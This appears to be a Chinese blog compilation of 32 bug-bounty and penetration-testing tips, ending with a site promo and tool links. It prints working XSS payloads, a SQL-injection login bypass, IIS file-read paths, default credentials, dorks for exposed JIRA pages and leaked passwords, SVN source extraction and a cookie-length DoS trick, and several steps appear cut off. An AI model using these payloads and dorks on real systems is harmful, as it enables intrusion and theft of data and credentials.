32 个实用渗透测试技巧收集涵盖了信息收集、漏洞利用、权限提升及工具链使用等核心领域。内容涉及 Wayback Machine 与 Gau 的 URL 提取、Shodan 资产侦察、SQL 注入认证绕过、默认凭证检测、配置文件泄露分析以及 XSS 载荷构造方法。此外还包括针对 CloudFront、JIRA、SVN 等特定场景的利用技巧,以及 GitHub 敏感信息泄露排查。所有示例均经过清洗,去除无关推广,聚焦于技术原理与实操命令。
本文整理了来自安全社区及社交平台的 32 个渗透测试实战技巧,涵盖信息收集、漏洞扫描、权限提升及工具链使用等核心领域。内容涉及 Wayback Machine 与 Gau 的 URL 提取、Shodan 资产侦察、SQL 注入认证绕过、默认凭证检测、配置文件泄露分析以及 XSS 载荷构造方法。此外还包括针对 CloudFront、JIRA、SVN 等特定场景的利用技巧,以及 GitHub 敏感信息泄露排查。
在注册账户后拦截请求,查看响应中的角色参数(如 role=USER)。通过搜索源码或 JS 文件寻找隐藏的管理员角色值(如 admin_role),使用 Burp Suite 的 Match & Replace 功能替换该值,尝试获取管理员权限。
IIS 服务器若配置不当,可能导致本地文件读取漏洞。攻击者可通过构造特定路径访问系统文件,例如:
http://anywebsite.com/c:/Windows/Win.ini
需检查服务器是否开启了目录列表或存在路径遍历风险。
CloudFront CDN 可能存在缓存投毒风险。尝试发送包含特殊字符的请求以绕过过滤,例如:
⚔️">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
此 Payload 可能因目标配置而异,需针对性测试。
利用 Wayback Machine 或 Gau 获取目标所有 URL,筛选出 JS 文件。使用 httpx 过滤存活域名,随后手动检查或使用 Nuclei 模板、TruffleSec Chrome 扩展进行深度分析。
检查 wp-config.php.swp 文件是否存在。如果直接访问返回 404,尝试添加后缀 .swp 或 ...。若返回 200 并下载成功,且包含十六进制编码内容,需进行解码分析以获取数据库凭据。
在登录框中尝试经典的 SQL 注入 payload 绕过认证:
username: '--'
password: '--'
或者使用 "--"。这通常能跳过密码验证逻辑。
许多系统存在默认账号密码,如 PSADMIN:PSADMIN, PS:PSPSEM:PSEM。可使用 Google Dork 查找暴露的登录页:
intitle:"Oracle+PeopleSoft+Sign-in"
编写 Nuclei 模板可批量测试所有组合。
使用 Nmap 进行服务版本探测,并在数小时后再次扫描以发现新开放的端口:
nmap -sV -iL host.txt -oN nmap_scan.txt
# 等待几小时
# 筛选开放端口
cat nmap_scan.txt | grep open
nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5
ghp_ 令牌,并尝试访问组织仓库。[alert][0].call(this,1) 绕过简单的过滤规则。始终使用 Shodan Dorking 进行资产发现。例如搜索特定公司的 SSL 证书并按 HTTP Title 过滤:
ssl:"Company Inc"
找到 Swagger UI 后,尝试利用 webjars-swagger-xss 漏洞: https://github.com/seanmarpo/webjars-swagger-xss
检查 .svn/wc.db 文件是否公开可访问:
https://target[.]com/.svn/wc.db
使用 svn-extractor 工具导出网站源代码: https://github.com/anantshri/svn-extractor
/config 目录,遇到 403 Forbidden。/config/FUZZ,可能发现具体配置文件。常见默认凭证 admin:admin。使用 Shodan 搜索:
ssl:"target[.]com" 200 http.title:"dashboard"
Google Dork 查找 JIRA 仪表盘页面:
inurl:/ConfigurePortalPages!default.jspa?view=popular
查找过滤器页面:
inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )
查找暴露的用户列表页面:
inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log
在 GitHub 上搜索包含敏感信息的 CSV 文件:
dork: "org:company extension:csv admin"
潜在泄露信息包括:信用卡号、CVV、邮箱、电话号码。
使用 Nilo, gxss 和 Dalfox 的一行命令进行 XSS 测试:
cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403
如果 GET 请求返回 XML 未找到,尝试将请求转换为 POST 并携带 XXE Payload。
从 AlienVault OTX 获取子域名的关联 URL:
for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
尝试不同的大小写组合来绕过 WAF 或访问控制:
phpmyadmin => 301
PHPmyadmin => 200
PHPMYadmin => 200
PHPMYADMIN => 200
phpMYadmin => 200
phpmyAdmin => 200
./dirsearch.py -u target -e php,html,js,xml -x 500,403
.svn/ 目录。./svn-extractor.py --url http://url.com --match database.php
在输入框中注入 Payload:
firstname:<img src=x middlename:onerror lastname:=alert(domain)/>
gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
通过注入大量逗号使 Cookie 长度超过请求头限制,导致拒绝服务:
url/dest?jwt=vulnerable-jwt-token。jwt= 参数解码了提供的令牌并在页面显示,则存在漏洞。for i in $(cat any.txt); do curl "$i" >> output.txt; done
drive, googledocs, google/spreadsheets/d/, document/d/。在某些应用中,手机号字段可能未做严格过滤,可尝试注入 HTML 或脚本标签进行测试。
domain docker。搜索 AWS、Jira、Okta 等服务的凭证:
1. Org:"target" pwd/pass/passwd/password
2. "target.atlassian" pwd/pass/passwd/password
3. "target.okta" pwd/pass/passwd/password
4. "Jira.target" pwd/pass/passwd/password
利用 Unwebpack Sourcemap 工具还原混淆代码: https://github.com/rarecoil/unwebpack-sourcemap
如果站点使用 AngularJS,测试 {{7*7}} 看是否渲染为 49。若启用 ASP.NET XSS 保护,优先测试其他类型漏洞。AngularJS 客户端模板注入参考:
https://github.com/tijme/angularjs-csti-scanner
Rails 应用 URL 通常遵循 /CONTENT_TYPE/RECORD_ID 模式,其中 ID 为自增整数。例如 HackerOne 的报告 URL 为 www.hackerone.com/reports/12345。应优先测试不安全的直接对象引用(IDOR)漏洞。
在进行渗透测试前,请务必获得书面授权。上述技巧仅供安全研究与防御参考,严禁用于非法用途。定期更新工具库,关注 CVE 漏洞情报,加强代码审计与配置管理,是保障系统安全的关键。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online